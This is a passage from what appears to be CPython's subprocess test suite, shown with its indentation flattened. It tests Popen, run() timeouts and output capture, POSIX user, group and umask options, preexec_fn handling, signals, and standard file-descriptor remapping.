os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
# Run a command that waits for user input, to check the repr() of
# a Popen object both while the subprocess runs and after it exits.
code = 'import sys; input(); sys.exit(57)'
cmd = [sys.executable, '-c', code]
result = "<Popen: returncode: {}"
with subprocess.Popen(
cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
self.assertIsNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
proc.communicate(input='exit...\n')
proc.wait()
self.assertIsNotNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# For simplicity this test is Linux-specific, to at least provide
# some coverage. The bug itself is not platform-specific.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
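# Popen and CompletedProcess support generic subscription (PEP 585).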
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# run() returns the child's exit status in CompletedProcess.returncode
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
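# capture stderr with zero return code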
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# run() can be called with input set to bytes
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
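# Keyword arguments such as env= are passed through run() to the child.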
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments and that exits quickly
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
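# capture_output=True captures both stdout and stderr.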
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines,
# as it depends on timing, but the margins are wide enough for normal
# situations and it does assert that the timeout fired "soon enough"
# to believe the right thing happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead captures the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment;
# that still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment;
# that still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so that the file it creates
# has a unique mode for us to check.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test; filesystems
# could be mounted to ignore or force them.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
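# str() of a CalledProcessError caused by a signal should name the signal.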
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals IntEnum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
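# preexec_fn runs in the child after fork() and before exec(), so the
# os.putenv() call above changes only the child's environment.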
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
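# Helpers for the fd-juggling tests below: _save_fds() dup()s each requested
# descriptor and records its inheritable flag; _restore_fds() dup2()s the
# saved copies back and closes the duplicates.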
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
